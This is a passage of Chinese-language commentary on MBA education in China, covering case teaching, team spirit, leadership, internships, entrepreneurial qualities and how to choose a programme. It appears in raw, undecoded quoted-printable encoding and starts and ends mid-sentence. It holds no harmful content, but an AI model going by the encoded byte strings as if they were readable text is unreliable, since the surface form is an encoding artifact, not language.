 =C4=C5=E0=D1=F8=CA=C7=B8=F7MBA=C3=FB=D0=A3=B5=C4=B9=B2=CD=AC=CC=D8=B5=E3=A3=AC=
 =B6=F8=C3=C0=B9=FA=C9=CC=D2=B5=D6=DC=BF=AF=D2=B2=BD=AB=B1=CF=D2=B5=C9=FA=B5=C4=
 =B7=D6=CE=F6=C4=DC=C1=A6=D7=F7=CE=AA=C9=CC=D1=A7=D4=BA=C5=C5=C3=FB=B5=C4=D6=D8=
 =D2=AA=D6=B8=B1=EA=D6=AE=D2=BB=A1=A3=C0=FD=C8=E7=C7=E5=BB=AA=B4=F3=D1=A7=B5=C4=
 =D6=F7=D2=AA=B7=BD=CA=BD=B1=E3=CA=C7=B2=C9=D3=C3=B0=B8=C0=FD=BD=CC=D1=A7=A1=A3=
 =BD=CC=D1=A7=D6=D0=CB=F9=B2=C9=D3=C3=B5=C4=B0=B8=C0=FD=B2=BF=B7=D6=C0=B4=D7=D4=
 =B9=FE=B7=F0=A1=A2MIT=A3=AC=B2=BF=B7=D6=CA=C7=B9=FA=C4=DA=C6=F3=D2=B5=B5=C4=CA=
 =B5=D5=BD=BE=AD=D1=E9=A1=A3=CE=AA=CC=E1=B8=DF=B0=B8=C0=FD=B5=C4=D6=CA=C1=BF=A3=
 =AC=D4=F6=C7=BF=D1=A7=C9=FA=BD=E2=BE=F6=D6=D0=B9=FA=C6=F3=D2=B5=B5=C4=CA=B5=BC=
 =CA=D4=CB=D3=AA=CE=CA=CC=E2=B5=C4=C4=DC=C1=A6=A3=AC=C7=E5=BB=AA=BE=AD=B9=DC=D1=
 =A7=D4=BA=D2=D1=BC=C6=BB=AE=CD=B6=D7=CA800=CD=F2=C8=CB=C3=F1=B1=D2=BD=A8=C9=E8=
 =D2=BB=B8=F6=D6=D0=B9=FA=C6=F3=D2=B5=B0=B8=C0=FD=BF=E2=A1=A3    
     2. =CD=C5=B6=D3=BE=AB=C9=F1=A3=BA=CF=D6=B4=FA=C6=F3=D2=B5=BE=AD=D3=AA=D3=
 =EB=B9=DC=C0=ED=D6=D0=A3=AC=CD=C5=B6=D3=BE=AB=C9=F1=CF=D4=B5=C3=D4=BD=C0=B4=D4=
 =BD=D6=D8=D2=AA=A3=AC=D4=DA=CB=D8=D6=CA=C5=E0=D1=F8=D6=D0=C7=BF=BB=AF=CD=C5=B6=
 =D3=BE=AB=C9=F1=B5=C4=C5=E0=D1=F8=BA=CD=B4=B8=C1=B6=CE=DE=D2=C9=CA=C7=B7=C7=B3=
 =A3=C3=F7=D6=C7=B5=C4=A1=A3=B1=C8=C8=E7=C7=E5=BB=AA=B9=FA=BC=CAMBA=B0=E0=B5=C4=
 =D1=A7=C9=FA=A3=AC=D4=DA=C8=EB=D1=A7=B5=C4=B3=F5=C6=DA=BE=CD=D2=AA=BE=AD=B9=FD=
 =D2=BB=B4=CE=CE=AA=C6=DA=D2=BB=D6=DC=B5=C4"ORIENTATION=A3=A8=B5=BC=CF=F2=A3=A9=
 "=BB=EE=B6=AF=A1=A3=BB=EE=B6=AF=B5=C4=D6=F7=D2=AA=C4=BF=B5=C4=BE=CD=CA=C7=CD=
 =A8=B9=FD=D2=BB=CF=B5=C1=D0=B5=C4=D3=CE=CF=B7=A3=A8=C8=E7=C6=A1=BE=C6=D4=CB=D7=
 =F7=A1=A2=C6=C6=B1=F9=D5=DF=B5=C8=A3=A9=A3=AC=CD=D8=D5=B9=D1=B5=C1=B7=A3=A8=C8=
 =E7=D2=B0=CD=E2=C9=FA=B4=E6=A1=A2=B8=DF=BF=D5=BF=E7=B6=CF=C7=C5=B5=C8=A3=A9=D1=
 =B5=C1=B7=C5=E0=D1=F8=D1=A7=C9=FA=B5=C4=CD=C5=B6=D3=D2=E2=CA=B6=BA=CD=B9=DB=C4=
 =EE=A1=A3=D5=E2=C6=E4=D6=D0=A3=AC=D1=A7=C9=FA=D2=B2=D1=A7=BB=E1=C8=E7=BA=CE=D7=
 =E9=B3=C9=CD=C5=B6=D3=D2=D4=BC=B0=C8=E7=BA=CE=D4=DA=CD=C5=B6=D3=D6=D0=B6=A8=CE=
 =BB=D7=D4=BC=BA=D2=D4=CA=B9=D5=FB=B8=F6=CD=C5=B6=D3=D0=CE=B3=C9=BA=CF=C1=A6=A1=
 =A3=B6=F8=C3=FB=C4=BF=B7=B1=B6=E0=B5=C4=BE=E3=C0=D6=B2=BF=A3=A8=C8=E7=BD=F0=C8=
 =DA=BE=E3=C0=D6=B2=BF=A1=A2IT=BE=E3=C0=D6=B2=BF=A1=A2CPA=BE=E3=C0=D6=B2=BF=A3=
 =A9=CA=C7=CD=AC=D1=A7=D7=D4=D3=C9=D7=E9=BA=CF=BA=CD=D1=A1=D4=F1=B5=C4=BD=E1=B9=
 =FB=A1=A3=B3=FD=C1=CB=D7=F7=CE=AA=D2=BB=B8=F6=CD=C5=CC=E5=C4=DC=CC=E1=B9=A9=B5=
 =C4Teamwork=B5=C4=BB=FA=BB=E1=A3=AC=BD=AB=D7=A8=D2=B5=D6=AA=CA=B6=C9=EE=BB=AF=
 =B2=A2=D3=EB=CA=B5=BC=F9=BD=E1=BA=CF=C6=F0=C0=B4=D2=B2=CA=C7=BE=E3=C0=D6=B2=BF=
 =B5=C4=D2=BB=B8=F6=D6=D8=D2=AA=CA=D5=BB=F1=A1=A3     3. =C1=EC=B5=BC=B2=C5=C4=
 =DC=A3=BA=D3=D0=D2=E2=CA=B6=B5=D8=C5=E0=D1=F8=B9=FA=BC=CAMBA=D1=A7=C9=FA=B5=C4=
 =C1=EC=B5=BC=B2=C5=C4=DC=A3=AC=CC=D8=B1=F0=CA=C7=B9=DC=C0=ED=BF=E7=B9=FA=C6=F3=
 =D2=B5=B5=C4=C1=EC=B5=BC=B2=C5=C4=DC=A1=A3=B3=FD=C1=CB=D4=DA=CF=E0=D3=A6=B5=C4=
 =BF=CE=B3=CC=D6=D0=CC=D6=C2=DB=D6=AE=CD=E2=A3=AC=BF=AA=D5=B9=B7=E1=B8=BB=B5=C4=
 =B5=DA=B6=FE=BF=CE=CC=C3=D2=D4=BC=B0=C6=F3=D2=B5=BC=D2=C2=DB=CC=B3=B5=C8=BB=EE=
 =B6=AF=D2=D4=D4=F6=BC=D3=CD=AC=D1=A7=C3=C7=B6=D4=C1=EC=B5=BC=B2=C5=C4=DC=B5=C4=
 =B8=D0=D0=D4=C8=CF=CA=B6=D2=B2=CA=C7=CD=BE=BE=B6=D6=AE=D2=BB=A1=A3=D5=E2=D0=A9=
 =BB=EE=B6=AF=D6=F7=D2=AA=CA=C7=C7=EB=B9=FA=C4=DA=CD=E2=D6=AA=C3=FB=C6=F3=D2=B5=
 =B5=C4=B9=DC=C0=ED=C8=CB=D4=B1=C0=B4=D1=DD=BD=B2=CA=DA=BF=CE=A3=AC=B2=A2=D3=EB=
 =D1=A7=C9=FA=BD=F8=D0=D0=D7=D4=D3=C9=B5=C4=BD=BB=C1=F7=A1=A3=C7=E5=BB=AA=BE=AD=
 =B9=DC=D1=A7=D4=BA=B5=DA=D2=BB=B8=B1=D4=BA=B3=A4=D5=D4=B4=BF=BE=F9=BD=CC=CA=DA=
 =D4=F8=CB=B5=B9=FD=A3=BA=D5=E2=D0=A9=B4=F3=C0=CF=B0=E5=B5=C4=C8=CB=C9=FA=BE=AD=
 =C0=FA=BE=CD=CA=C7=D2=BB=B2=BF=B2=BF=C9=FA=B6=AF=B5=C4=BD=CC=B2=C4=A3=AC=D3=D0=
 =D0=ED=B6=E0=B6=AB=CE=F7=CA=C7=D5=FD=CA=BD=BF=CE=B3=CC=C0=EF=D1=A7=B2=BB=B5=BD=
 =B5=C4=A1=A3    
    4. =CA=B5=BC=F9=C4=DC=C1=A6=A3=BA=CA=D7=CF=C8=D4=DA=BF=CE=B3=CC=C9=E8=BC=C6=
 =C9=CF=A3=AC=D1=A7=D4=BA=D2=BB=B0=E3=B0=B2=C5=C5=C1=CB=C6=F3=D2=B5=B5=F7=B2=E9=
 =D7=A8=CC=E2=A1=A2=BE=AD=BC=C3=B7=D6=CE=F6=D7=A8=CC=E2=A1=A2=CA=D0=B3=A1=B7=D6=
 =CE=F6=D7=A8=CC=E2=A1=A2=B2=C6=CE=F1=B7=D6=CE=F6=D7=A8=CC=E2=D2=D4=BC=B0=D7=A8=
 =D2=B5=D7=DB=BA=CF=D7=A8=CC=E2=B5=C8=CA=B5=BC=F9=BB=B7=BD=DA=A1=A3=D5=E2=D0=A9=
 =BB=B7=BD=DA=B6=BC=D2=AA=C7=F3=D1=A7=C9=FA=D2=D4=D0=A1=D7=E9=CE=AA=B5=A5=CE=BB=
 =A3=AC=D6=B1=BD=D3=BA=CD=C6=F3=D2=B5=C1=AA=CF=B5=A3=AC=B7=A2=CF=D6=B2=A2=BD=E2=
 =BE=F6=CA=B5=BC=CA=CE=CA=CC=E2=A3=AC=D7=EE=BA=F3=D4=D9=CC=E1=BD=BB=D2=BB=B7=DD=
 =D5=FD=CA=BD=B5=C4=CA=B5=BC=F9=D7=DC=BD=E1=B1=A8=B8=E6=A1=A3=C6=E4=B4=CE=CA=C7=
 =C3=BF=C4=EA=CA=EE=BC=D9=B5=C4=CA=B5=CF=B0=A1=A3=CD=AC=D1=A7=C3=C7=D4=DAMBA=BE=
 =CD=D2=B5=D6=B8=B5=BC=D6=D0=D0=C4=B5=C4=D6=B8=B5=BC=CF=C2=A3=AC=D6=F7=B6=AF=B3=
 =F6=BB=F7=A3=AC=B5=BD=B8=F7=D0=D0=B8=F7=D2=B5=A3=AC=CC=D8=B1=F0=CA=C7=BF=E7=B9=
 =FA=C6=F3=D2=B5=BD=F8=D0=D0=CE=AA=C6=DA=C1=BD=B8=F6=D4=C2=B5=C4=CA=B5=CF=B0=A1=
 =A3=C6=E4=D6=D0=D4=DA=D4=DE=D6=FA=C9=CC=B5=C4=D6=A7=B3=D6=CF=C2=A3=AC=B2=BB=C9=
 =D9=CD=AC=D1=A7=B5=BD=CF=E3=B8=DB=A1=A2=D0=C2=BC=D3=C6=C2=CA=B5=CF=B0=A1=A3=BF=
 =C9=D2=D4=CB=B5=A3=AC=D5=E2=CB=C4=B4=F3=CB=D8=D6=CA=B5=C4=C5=E0=D1=F8=CA=C7=
 MBA=BD=CC=D3=FD=C8=A1=CA=A4=B5=C4=B9=D8=BC=FC
                       MBA=BD=CC=D3=FD=C5=E0=D1=F8=C6=F3=D2=B5=BC=D2=B5=C4=C9=
 =FA=BB=EE=B7=BD=CA=BD
     =B5=BD=B5=D7=D6=D0=B9=FAMBA=D1=A7=D0=A3=B5=C4=C5=E0=D1=F8=C4=BF=B1=EA=D3=
 =A6=B8=C3=CA=C7=CA=B2=C3=B4=A3=BF     =C6=F3=D2=B5=BC=D2=D2=AA=D3=D0=C8=FD=C9=
 =CC=CB=C4=C4=DC=C1=A6=D2=BB=CB=D8=D1=F8      21=CA=C0=BC=CD=BE=DF=D3=D0=B9=FA=
 =BC=CA=BE=BA=D5=F9=C1=A6=B5=C4=C6=F3=D2=B5=BC=D2=D3=A6=B8=C3=BE=DF=B1=B83=C9=
 =CC=A1=A24=D6=D6=C4=DC=C1=A6=A1=A21=D6=D6=CB=D8=D1=F8=A1=A3     3=C9=CC=CA=D7=
 =CF=C8=CA=C7=B8=DF=D6=C7=C9=CC=A3=AC=D5=E2=BA=DC=BA=C3=C0=ED=BD=E2=A3=AC=D2=BB=
 =B8=F6=C8=F5=D6=C7=B5=C4=C8=CB=D4=F5=C3=B4=C5=E0=D1=F8=D2=B2=B3=C9=B2=BB=C1=CB=
 =C6=F3=D2=B5=BC=D2=A3=AC=B5=AB=BD=F6=D3=D0=B8=DF=D6=C7=C9=CC=CA=C7=B2=BB=B9=BB=
 =B5=C4=A3=AC=C6=F3=D2=B5=BC=D2=B1=D8=D0=EB=BA=CD=C9=E7=BB=E1=A3=AC=BA=CD=D7=D4=
 =BC=BA=B5=C4=CD=C5=B6=D3=B4=F2=BD=BB=B5=C0=A3=AC=CB=F9=D2=D4=B1=D8=D0=EB=BB=B9=
 =D3=D0=B8=DF=B5=C4=C7=E9=C9=CC=A1=A3=CD=AC=CA=B1=A3=AC=CB=FB=BB=B9=D0=E8=D2=AA=
 =D3=D0"=B5=A8=C9=CC"=A3=AC=D2=B2=BE=CD=CA=C7=B5=A8=C2=D4=A3=BA=D2=AA=D7=F6=C6=
 =F3=D2=B5=BC=D2=B1=D8=D0=EB=B8=C3=B3=F6=CA=D6=CA=B1=BE=CD=B3=F6=CA=D6=A1=A3=CB=
 =FC=B2=BB=CA=C7=C3=A4=C4=BF=B5=C4=A3=AC=CA=C7=C9=C6=D3=DA=D7=A5=D7=A1=BB=FA=D3=
 =F6=A3=AC=CE=D2=C3=C7=B3=A3=CB=B5"=CA=B1=BC=E4=BE=CD=CA=C7=BD=F0=C7=AE"=A3=AC=
 =C6=E4=CA=B5=CA=B1=BB=FA=B2=C5=CA=C7=BD=F0=C7=AE=A3=AC=CB=AD=D7=A5=D7=A1=CA=B1=
 =BB=FA=CB=AD=BE=CD=C4=DC=D7=AC=C7=AE=A1=A321=CA=C0=BC=CD=BE=DF=D3=D0=B9=FA=BC=
 =CA=BE=BA=D5=F9=C1=A6=B5=C4=C6=F3=D2=B5=BC=D2=B1=D8=D0=EB=CA=C73=C9=CC=BD=E1=
 =BA=CF=A1=A3    
     MBA=D1=A7=D0=A3=B5=C4=C8=CE=CE=F1=BE=CD=CA=C7=D2=AA=BF=AA=B7=A2=D5=E23=C9=
 =CC=A3=ACGMAT=BF=BC=B2=E9=B5=C4=CA=C7=D6=C7=C9=CC=A3=AC=C3=E6=CA=D4=D6=F7=D2=
 =AA=CA=C7=B2=E2=CA=D4=C7=E9=C9=CC=A3=AC=C1=ED=CD=E2=CE=D2=C3=C7=BB=B9=BF=B4=B1=
 =B3=BE=B0=A3=AC=D5=E2=BF=C9=D2=D4=BF=BC=B2=E9=C6=E4=B5=A8=C9=CC=A1=A3     
     4=D6=D6=C4=DC=C1=A6=CA=D7=CF=C8=CA=C7=B4=B4=D0=C2=C4=DC=C1=A6=A3=AC=C6=F3=
 =D2=B5=BE=BA=D5=F9=B1=D8=D0=EB=D2=C0=BF=BF=CB=FC=A3=BB=C6=E4=B4=CE=CA=C7=D3=A6=
 =B1=E4=C4=DC=C1=A6=A3=ACMBA=D2=AA=D1=A7=BB=E1=D4=DA=C8=CE=BA=CE=CC=F5=BC=FE=CF=
 =C2=B6=BC=C4=DC=D7=AC=C7=AE=A3=AC=D4=DA=D2=F8=B8=F9=CB=C9=B5=C4=CA=B1=BA=F2=BF=
 =C9=D2=D4=D5=F5=B5=BD=C7=AE=D2=F8=B8=F9=BD=F4=B5=C4=CA=B1=BA=F2=D2=B2=C4=DC=D5=
 =F5=B5=BD=C7=AE=A3=AC=D4=DA=B7=A8=D6=C6=BD=A1=C8=AB=BE=AD=BC=C3=B7=A2=B4=EF=B5=
 =C4=B9=FA=BC=D2=A1=A2=B5=D8=C7=F8=C4=DC=D5=F5=B5=BD=C7=AE=A3=AC=D4=DA=B7=A8=D6=
 =C6=B2=BB=BD=A1=C8=AB=B5=C4=B2=BB=B7=A2=B4=EF=B9=FA=BC=D2=D2=B2=C4=DC=D5=F5=B5=
 =BD=C7=AE=A3=BB=B5=DA=C8=FD=CA=C7=B9=AB=B9=D8=C4=DC=C1=A6=A3=AC=D2=AA=C9=C6=D3=
 =DA=D3=AA=D4=EC=D2=BB=B8=F6=C1=BC=BA=C3=B5=C4=D6=DC=B1=DF=BB=B7=BE=B3=A3=AC=BA=
 =CD=CD=AC=D0=D0=A1=A2=D5=FE=B8=AE=A1=A2=BF=CD=BB=A7=B6=BC=D2=AA=D3=D0=C1=BC=BA=
 =C3=B5=C4=B9=D8=CF=B5=A3=BB=B5=DA=CB=C4=CA=C7=D7=E9=D6=AF=C4=DC=C1=A6=A3=AC=C4=
 =DC=B9=BB=B0=D1=D7=D4=BC=BA=B5=C4=CD=C5=B6=D3=C4=FD=BE=DB=C6=F0=C0=B4=A1=A3   =
    =D2=BB=D6=D6=CB=D8=D1=F8=CA=C7=B1=D8=D0=EB=D3=D0=B6=E0=D4=AA=CE=C4=BB=AF=B5=
 =C4=CB=D8=D1=F8=A3=AC=D5=E2=CA=C7=BE=AD=BC=C3=C8=AB=C7=F2=BB=AF=BA=CD=B9=FA=BC=
 =CA=BE=BA=D5=F9=B5=C4=D0=E8=D2=AA=A1=A3=CE=DE=C2=DB=CA=C7=D4=DA=BF=E7=B9=FA=B9=
 =AB=CB=BE=B9=A4=D7=F7=A3=AC=BB=B9=CA=C7=B4=B4=C1=A2=D7=D4=BC=BA=B5=C4=B9=FA=BC=
 =CA=D0=CD=C6=F3=D2=B5=A3=AC=B6=BC=B1=D8=D0=EB=C1=CB=BD=E2=CA=C0=BD=E7=C9=CF=B2=
 =BB=CD=AC=B9=FA=BC=D2=BA=CD=C3=F1=D7=E5=B5=C4=CE=C4=BB=AF=A1=A3     
    =B9=C4=C0=F8MBA=D1=A7=D4=B1=BD=F8=BE=FC=CD=E2=C6=F3    
    =D6=D0=B9=FA=D3=A6=B8=C3=C5=E0=D1=F821=CA=C0=BC=CD=BE=DF=D3=D0=B9=FA=BC=CA=
 =BE=BA=D5=F9=C1=A6=B5=C4=C6=F3=D2=B5=BC=D2=BA=CD=B8=DF=BC=B6=B9=DC=C0=ED=C8=CB=
 =B2=C5=A1=A3    
     MBA=D1=A7=D4=B1=BD=F8=BE=FC=CD=E2=C6=F3=A1=A3=CB=E4=C8=BB=CB=FB=C3=C7=B2=
 =BB=BF=C9=B1=DC=C3=E2=B5=D8=D2=AA=CE=AA=CD=E2=B9=FA=C8=CB=D7=AC=C7=AE=A3=AC=B5=
 =AB=D6=BB=D3=D0=D1=A7=CF=B0=CD=E2=B9=FA=C8=CB=D4=F5=C3=B4=D7=AC=D6=D0=B9=FA=C8=
 =CB=B5=C4=C7=AE=A3=AC=B2=C5=C4=DC=D6=AA=B5=C0=BD=AB=C0=B4=D4=F5=C3=B4=D7=AC=CD=
 =E2=B9=FA=C8=CB=B5=C4=C7=AE=A1=A3=CB=FB=C3=C7=CD=AC=CA=B1=D2=B2=C4=DC=B3=C9=CE=
 =AA=D2=FD=BD=F8=CD=E2=D7=CA=BA=CD=CF=C8=BD=F8=BC=BC=CA=F5=B5=C4=C7=C5=C1=BA=A1=
 =A3     
    =D4=DA=D1=A7=BA=C3=B9=FA=BC=CA=BE=AD=BC=C3=D4=CB=D0=D0=BB=FA=D6=C6=BA=F3=A3=
 =AC=D5=E2=D0=A9=D6=D0=B9=FA=B5=C4=BE=AD=BC=C3=BE=AB=D3=A2=BC=C8=BF=C9=BB=D8=B5=
 =BD=D6=D0=B7=BD=C6=F3=D2=B5=A3=AC=D6=D8=D0=C2=B4=B4=D2=B5=A3=AC=D2=B2=BF=C9=D2=
 =D4=BC=CC=D0=F8=C1=F4=D4=DA=CD=E2=C6=F3=B9=A4=D7=F7=A1=A3=BE=AD=BC=C3=C8=AB=C7=
 =F2=BB=AF=C7=F7=CA=C6=BD=AB=B4=F8=C0=B4=BF=E7=B9=FA=B9=AB=CB=BE=B5=C4=B1=BE=CD=
 =C1=BB=AF=A3=AC=CE=B4=C0=B4=B5=C4=CB=FB=C3=C7=BF=C9=C4=DC=B3=C9=CE=AA=CD=E2=B9=
 =FA=B9=AB=CB=BE=B5=C4=D7=DC=B2=C3=A1=A3    
  MBA=D1=A7=D4=BA=D3=A6=CD=EA=C8=AB=C3=E6=CF=F2=CA=D0=B3=A1    
  MBA=CA=C7=D2=BB=B8=F6=C3=E6=CF=F2=CA=D0=B3=A1=B5=C4=BD=CC=D3=FD=A3=AC=CA=D0=
 =B3=A1=D2=D1=BE=AD=B3=D0=C8=CF=C1=CB=CE=D2=C3=C7=A1=A3=CE=D2=C3=C7=B5=C4=D1=A7=
 =B7=D1=BA=DC=B8=DF=A3=AC=BB=B9=D3=D0=BA=DC=B6=E0=C8=CB=B1=A8=C3=FB=A3=AC=D2=F2=
 =CE=AA=CB=FB=C3=C7=B1=CF=D2=B5=D6=AE=BA=F3=A3=AC=C4=EA=D0=BD=C9=D9=B5=C4=B6=BC=
 =D2=AA=CA=AE=BC=B8=CD=F2=A3=AC=D7=EE=B6=E0=B4=EF60=CD=F2=A3=AC=CE=D2=C3=C7=B5=
 =C4=D1=A7=D4=B1=CA=DC=B5=BD=C1=CB=BA=DC=B6=E0=B4=F3=C6=F3=D2=B5=B5=C4=BB=B6=D3=
 =AD=A1=A3=B2=BB=BD=F6=CA=D0=B3=A1=B3=D0=C8=CF=CE=D2=C3=C7=A3=AC=CD=AC=D0=D0=D2=
 =B2=C8=CF=BF=C9=C1=CB=CE=D2=C3=C7=A1=A3=CE=D2=C3=C7=BA=CD=CA=C0=BD=E7=B8=F7=B9=
 =FA=BA=DC=B6=E0=D3=D0=C3=FB=B5=C4=C9=CC=D1=A7=D4=BA=BD=BB=BB=BB=D1=A7=C9=FA=
 "=A1=A3     
   MBA=BD=CC=D3=FD=B1=D8=D0=EB=C3=E6=CF=F2=CA=D0=B3=A1    
   =B6=FE=D5=BD=D2=D4=BA=F3=A3=AC=C3=C0=B9=FA=D7=DC=B2=C3=D2=BB=BC=B6=B5=C4=C6=
 =F3=D2=B5=BC=D2=D3=D01500=B6=E0=C8=CB=A1=A2=D7=DC=BE=AD=C0=ED=D2=BB=BC=B6=D3=
 =D02000=B6=E0=C8=CB=CA=C7=B4=D3=BE=FC=CA=C2=D4=BA=D0=A3=B1=CF=D2=B5=B5=C4=A1=
 =A3=D5=E2=B8=F8=CE=D2=C3=C7=C7=C3=CF=EC=C1=CB=BE=AF=D6=D3=A3=ACMBA=BD=CC=D3=FD=
 =BE=F8=B2=BB=D6=BB=CA=C7=D1=A7=D4=BA=CA=BD=BD=CC=D3=FD=A1=A3=D3=D0=CE=BB=CE=F7=
 =B5=E3=BE=FC=D0=A3=B1=CF=D2=B5=B5=C4=C6=F3=D2=B5=BC=D2=CB=B5=A3=AC"=D4=DA=C9=
 =CC=D1=A7=D4=BA=D1=A7=B5=C4=CA=C7=C1=EC=B5=BC=BF=CE=B3=CC=A3=AC=B5=AB=CA=C7=CE=
 =D2=D4=DA=CE=F7=B5=E3=BE=FC=D0=A3=D1=A7=B5=C4=CA=C7=C1=EC=B5=BC=B5=C4=C9=FA=BB=
 =EE=B7=BD=CA=BD=A1=A3"=C4=C7=C0=EF=C5=E0=D1=F8=C1=CB=CB=FB=D2=BB=D6=D6=D4=DA=
 =C4=E6=BE=B3=D6=D0=C7=F3=C9=FA=B4=E6=B5=C4=C4=DC=C1=A6=A1=A3MBA=BD=CC=D3=FD=D2=
 =AA=C5=AC=C1=A6=C5=E0=D1=F8=D5=E2=D6=D6=C9=FA=BB=EE=B7=BD=CA=BD=A1=A3
                         =D1=A1=B6=C1MBA=B5=C4=C8=FD=B4=F3=D4=AD=D4=F2
     =CB=E6=D7=C5=D6=D0=B9=FA=BC=D3=C8=EBWTO=B5=C4=C1=D9=BD=FC=A3=AC=D6=D0=B9=
 =FA=BE=AD=BC=C3=D3=EB=CA=C0=BD=E7=BE=AD=BC=C3=D2=BB=CC=E5=BB=AF=C7=F7=CA=C6=B5=
 =C4=BD=C5=B2=BD=D4=BD=C0=B4=D4=BD=BF=EC=A1=A3=D4=DA=D5=E2=D2=BB=C7=F7=CA=C6=B5=
 =C4=CD=C6=B6=AF=CF=C2=A3=AC=D6=D0=B9=FA=D0=E8=D2=AA=B4=F3=C1=BF=B8=DF=CB=D8=D6=
 =CA=C8=CB=B2=C5=A3=AC=D3=C8=C6=E4=C6=C8=C7=D0=D0=E8=D2=AA=C5=E0=D1=F8=B3=F6=D2=
 =BB=B4=F3=C5=FA=B9=FA=BC=CA=BB=AF=B5=C4=B8=DF=D6=CA=C1=BFMBA=C8=CB=B2=C5=A1=A3=
 =C7=BF=C1=D2=B5=C4=CA=D0=B3=A1=D0=E8=C7=F3=A3=AC=CA=B9=D4=BD=C0=B4=D4=BD=B6=E0=
 =B5=C4=D3=D0=D6=BE=D6=AE=CA=BF=D3=BB=D4=BE=CD=B6=C8=EB=B5=BD=BF=BC=B6=C1MBA=D1=
 =A7=CE=BB=B5=C4=C8=C8=B3=B1=D6=AE=D6=D0=A1=A3     
    =BD=FC=BC=B8=C4=EA=C0=B4=A3=AC=B9=FA=C4=DAMBA=BD=CC=D3=FD=B5=C4=B7=A2=D5=B9=
 =CF=E0=B5=B1=D1=B8=C3=CD=A3=AC=C8=BB=B6=F8=A3=AC=B8=F7=B5=D8=B2=E3=B3=F6=B2=BB=
 =C7=EE=B5=C4MBA=C8=B4=C1=EE=C8=CB=D1=DB=BB=A8=E7=D4=C2=D2=A3=AC=D2=D4=D6=C1=D3=
 =DA=C8=C3=C8=CB=C1=BC=DD=AC=C4=D1=B7=D6=A1=A3     
    =B4=D3=D1=A7=CE=BB=D7=B4=BF=F6=C0=B4=BF=B4=A3=AC=C4=BF=C7=B0=B9=FA=C4=DA=
 MBA=D1=A7=CE=BB=D6=F7=D2=AA=C0=B4=D7=D4=D3=DA=D2=D4=CF=C2=BC=B8=B8=F6=B7=BD=C3=
 =E6=A3=BA=D6=D0=B9=FA=B9=FA=C4=DA=B4=F3=D1=A7=B6=C0=C1=A2=C5=E0=D1=F8=B5=C4=A3=
 =AC=B9=FA=BC=D2=B3=D0=C8=CF=D1=A7=C0=FA=B5=C4MBA=A3=BB=D6=D0=B9=FA=B9=FA=C4=DA=
 =B4=F3=D1=A7=B6=C0=C1=A2=C5=E0=D1=F8=B5=C4MBA=D1=D0=BE=BF=C9=FA=BF=CE=B3=CC=B0=
 =E0=A3=A8=C3=BB=D3=D0=D1=A7=CE=BB=A3=A9=A3=BB=B9=FA=BC=D2=BE=AD=C3=B3=CE=AF=D3=
 =C3=CD=C6=BC=F6=D3=EB=BF=BC=CA=D4=CF=E0=BD=E1=BA=CF=D0=CE=CA=BD=D5=D0=CA=D5=D4=
 =DA=D6=B0=C8=CB=D4=B1=B9=A5=B6=C1=B5=C4=B9=A4=C9=CC=CB=B6=CA=BFEMBA=A3=A8=B9=
 =FA=BC=D2=B3=D0=C8=CF=D1=A7=CE=BB=A3=A9=A3=BB=BE=B3=CD=E2=D2=BB=C1=F7=C9=CC=D1=
 =A7=D4=BA=D3=EB=B9=FA=C4=DA=D6=F8=C3=FB=B4=F3=D1=A7=BA=CF=D7=F7=A3=AC=B0=E4=B7=
 =A2=BE=B3=CD=E2=D1=A7=CE=BB=B5=C4MBA(=B9=FA=BC=D2=B3=D0=C8=CF=D1=A7=CE=BB)=A3=
 =BB=BE=B3=CD=E2=D2=BB=C1=F7=C9=CC=D1=A7=D4=BA=D3=EB=B9=FA=C4=DA=B4=F3=D1=A7=D3=
 =D0=D0=A9=BA=CF=D7=F7=A3=AC=B5=AB=C8=D4=B7=A2=B9=FA=C4=DA=D1=A7=CE=BB=B5=C4=
 MBA=A3=BB=BE=B3=CD=E2=C9=CC=D1=A7=D4=BA=D3=EB=B9=FA=C4=DA=C6=F3=D2=B5=BB=F2=BD=
 =CC=D3=FD=BB=FA=B9=B9=BA=CF=D7=F7=A3=AC=B0=E4=B7=A2=BE=B3=CD=E2=D1=A7=CE=BB=B5=
 =C4MBA(=CE=B4=B5=C3=B5=BD=B9=FA=BC=D2=C9=F3=C5=FA=B2=A2=B3=D0=C8=CF=D1=A7=CE=
 =BB)=A1=A3    
    =B4=D6=C2=D4=BC=C6=CB=E3=D2=BB=CF=C2=A3=AC=D6=D0=B9=FA=B9=FA=C4=DA=D3=D0=D7=
 =CA=B8=F1=B0=E4=B7=A2MBA=D1=A7=CE=BB=B5=C4=B8=DF=D0=A3=D3=D062=CB=F9=D6=AE=B6=
 =E0=A3=AC=BC=D3=C9=CF=B8=F7=D6=D6=BE=B3=C4=DA=CD=E2=BA=CF=D7=F7=CF=EE=C4=BF=BC=
 =B0=D0=ED=B6=E0=B2=A2=CE=B4=B5=C3=B5=BD=B9=FA=BC=D2=C9=F3=C5=FA=B2=A2=B3=D0=C8=
 =CF=D1=A7=CE=BB=B5=C4MBA=A3=AC=C4=BF=C7=B0=B9=FA=C4=DA=C3=BF=C4=EA=B9=B2=D3=D0=
 =B0=D9=D6=D6=D2=D4=C9=CFMBA=CF=EE=C4=BF=D4=DA=D5=D0=C9=FA=A1=A3=BF=C9=D2=D4=CF=
 =EB=CF=F3=A3=AC=D5=E2=B6=D4=D2=BB=B8=F6=CF=EB=B6=C1MBA=B5=C4=C8=CB=C0=B4=CB=B5=
 =D0=E8=D2=AA=BB=A8=B6=E0=C9=D9=CA=B1=BC=E4=C0=B4=BD=F8=D0=D0=D1=A1=D4=F1=A1=A3=
 =C9=D4=D3=D0=B2=BB=C9=F7=A3=AC=B2=BB=BD=F6=CD=F7=B7=D1=CA=FD=CD=F2=D4=AA=D1=A7=
 =B7=D1=BC=B0=B4=F3=C1=BF=CA=B1=BC=E4=A3=AC=B6=F8=C7=D2=B5=BD=CD=B7=C0=B4=C4=C3=
 =B5=BD=B5=C4=D2=BB=D6=BD=CE=C4=C6=BE=BF=C9=C4=DC=BB=E1=CA=C7=C8=E7=B7=BD=BA=E8=
 =BD=A5=B5=C4=BF=CB=C0=B3=B5=C7=B4=F3=D1=A7=D1=A7=C0=FA=A3=AC=C3=BB=D3=D0=C8=CE=
 =BA=CE=BA=AC=BD=F0=C1=BF=A3=AC=BB=F2=BA=AC=BD=F0=C1=BF=B2=BB=B9=BB=A1=A3     
 =
    =D2=F2=B4=CB=A3=AC=CF=EB=B1=A8=BF=BCMBA=D5=DF=B2=BB=B5=C3=B2=BB=B2=C1=C1=C1=
